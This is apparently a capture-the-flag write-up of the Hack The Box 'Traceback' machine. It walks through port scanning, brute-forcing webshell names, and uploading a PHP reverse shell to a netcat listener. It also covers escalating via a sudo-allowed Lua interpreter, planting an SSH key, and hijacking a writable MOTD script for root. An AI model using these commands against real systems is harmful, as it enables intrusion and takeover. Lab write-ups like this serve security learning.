Hello everyone and welcome back to yet another HTB writeup.
Our initial nmap scan reveals only an ssh and webserver open.
root@kali:~/Desktop/htb/Traceback# nmap -sC -sV 10.10.10.181 -p 1-65535 -o TCP_full_scan [1/1] Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 20:46 EDT Nmap scan report for 10.10.10.181 Host is up (0.036s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds
On the website we find an interesting comment in the source :
<body> <center> <h1>This site has been owned</h1> <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2> <h3> - Xh4H - </h3> <!--Some of the best web shells that you might need ;)--> </center> </body>
Dirbusting for files and folders with seclists then fuzzing to find virtual hosts gives no result.
root@kali:~/Desktop/htb/Traceback# wfuzz -H "Host: FUZZ.traceback.htb" -u "http://traceback.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 151 ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://traceback.htb/ Total requests: 4997 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000690: 400 12 L 53 W 422 Ch "gc._msdcs" Total time: 48.01821 Processed Requests: 4997 Filtered Requests: 4996 Requests/sec.: 104.0646
We consider the hint previously given and build a list of webshells that we are going to bruteforce on the box, revealing /smevk.php.
root@kali:~/Desktop/htb/Traceback# cat wordlist 1n73ction.php 52.php OsComPayLoad.php c99.php cgi cgipro1.php cgiproffesional.php indoxploit k2 marion001 pak.php r57.php shell4sym.php smtp.php up.txt upluad.php wso alfa3.php alfav3.0.1.php andela.php bloodsecv4.php by.php c99ud.php cmd.php configkillerionkros.php jspshell.jsp mini.php obfuscated-punknopass.php punk-nopass.php punkholic.php r57.php smevk.php wso2.8.5.php
We stumble upon a login page and directly get in with admin:admin, and we have full webshell. We proceed to upload a php reverse shell and obtain a shell as webadmin.
root@kali:~/Desktop/htb/Traceback# nc -lvp 9999 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.10.181. Ncat: Connection from 10.10.10.181:56150. Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 21:21:43 up 1:26, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) /bin/sh: 0: can't access tty; job control turned off
We quickly find a way to pivot as sysadmin, as well as an interesting note.
$ sudo -l Matching Defaults entries for webadmin on traceback: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User webadmin may run the following commands on traceback: (sysadmin) NOPASSWD: /home/sysadmin/luvit $ cd /home/webadmin $ ls -la total 48 drwxr-x--- 5 webadmin sysadmin 4096 Apr 15 20:18 . drwxr-xr-x 4 root root 4096 Aug 25 2019 .. -rw------- 1 webadmin webadmin 449 Apr 15 20:51 .bash_history -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout -rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile drwxrwxr-x 2 webadmin webadmin 4096 Apr 15 20:16 .ssh -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt $ cat note.txt - sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question. $
Since we can run a lua script with sysadmin privileges, we proceed to create a lua file and run it as sysadmin.
$ echo -n "os.execute('/bin/sh')" > privesc.lua $ sudo -u sysadmin /home/sysadmin/luvit privesc.lua sh: turning off NDELAY mode id uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
We then proceed to add our ssh public key to the sysadmin authorized_keys to obtain a full interactive shell; in our attacker machine :
root@kali:~/Desktop/htb/Traceback# ssh-keygen -t rsa -b 4096 Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): key Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in key. Your public key has been saved in key.pub. The key fingerprint is: SHA256:mXCRn4D967VXQglQu7bEyfVgdJ8PRGHmaoEJQBA8q7E root@kali The key's randomart image is: +---[RSA 4096]----+ | .o+o+o..o..B..| | o . +o o.B .o| | o. .+o.o.*o.| | . . o o+o Bo+.| | + S .X. o| | E .+... .| | . ... o | | . . . | | . | +----[SHA256]-----+ root@kali:~/Desktop/htb/Traceback#
In our victim machine :
pwd /home/sysadmin echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCpdSnm22bs8CSg8fHuOWhyDn56TAR+BV9DUZaKUyWT2DtPEzfuKgXcGd65IXZLl/fN0e7El0uVr9QiwIqkzTWOGQfFY0gO9OSTGpLEh4jP4caG24H0sPUY5cp6SCwveGWSxnBBa2I2IBjEzHE0ML0pVWA5U3Qw7N8gT24CskklfFm8oaZ2ZVCDpDRZ9Ow+NjDkVRMJLfPIRqsYVaKaiGMNeCBIIoN3OqTWqapx89S2oAbwfKOz9zEMq+Gzx9ibJDy+FYGPGiblZ5eKfdiI4jPrfQFpsex2D7VcLjtOme7FeFzo+22QuUIEuHo1Qg2siVwWkLDJCN+b7mUA1nm/k2/qOetiYuGCnj5mNv9BEht4sADGI4XRSwrHTHIQYiz7dZuw5bKmdxUVapsV/WiShCpIKbsFeaQenploOlgsK7qjknHYwkUUY7/4Y10cM5+1zlV4Vubl/dRAEHeufeXcEuXapKw6kFLDawRIhzFI8Mui3R2RfnyorPHWvyrT4Futztpg9JnWrr6+U73475C8mXZZaZSTizWrySgcRPFL6sW+JfTkn6xmSL7ss3KOBCdc0Z7as5WB5xizl1yf9TxFYuNu8BNcG9YOfJUI1OJHW0mwz8PgB6RLqtXeS5ZR5PXVwONhFX39nkz7OrCEgpsG0J9jST03M820k/YorWNeOeAw5Q== root@kali" >> ./.ssh/authorized_keys
We login as sysadmin with ssh and proceed to enumerate the machine, we quickly find this process running :
root@kali:~/Desktop/htb/Traceback# ssh -i key sysadmin@10.10.10.181 ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# Welcome to Xh4H land Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2 $ id uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin) $ ps aux [...snip...] root 3979 0.0 0.0 58792 3180 ? S 21:32 0:00 /usr/sbin/CRON -f root 3982 0.0 0.0 4628 860 ? Ss 21:32 0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ root 3984 0.0 0.0 7468 772 ? S 21:32 0:00 sleep 30 [..snip...]
Theres a program copying the root MOTD files to another folder. According to ubuntu man pages :
UNIX/Linux system adminstrators often communicate important information to console and
remote users by maintaining text in the file /etc/motd, which is displayed by the
pam_motd(8) module on interactive shell logins.
Luckily, /etc/update-motd.d/ is writeable by sysadmin. However we have a 30 seconds window before our files are squashed by the /var/backups/.update-motd.d/ files.
sysadmin@traceback:/etc/update-motd.d$ ls -la total 32 drwxr-xr-x 2 root sysadmin 4096 Aug 27 2019 . drwxr-xr-x 80 root root 4096 Mar 16 03:55 .. -rwxrwxr-x 1 root sysadmin 981 Apr 15 21:50 00-header -rwxrwxr-x 1 root sysadmin 982 Apr 15 21:50 10-help-text -rwxrwxr-x 1 root sysadmin 4264 Apr 15 21:50 50-motd-news -rwxrwxr-x 1 root sysadmin 604 Apr 15 21:50 80-esm -rwxrwxr-x 1 root sysadmin 299 Apr 15 21:50 91-release-upgrade sysadmin@traceback:/etc/update-motd.d$ cat 00-header #!/bin/sh # [..snip...] [ -r /etc/lsb-release ] && . /etc/lsb-release
We simply add a command in the 00-header file to call our php-reverse-shell.php and have less than 30 seconds to login as ssh to obtain our command executed and get root user on our listener!
And again, thanks for reading!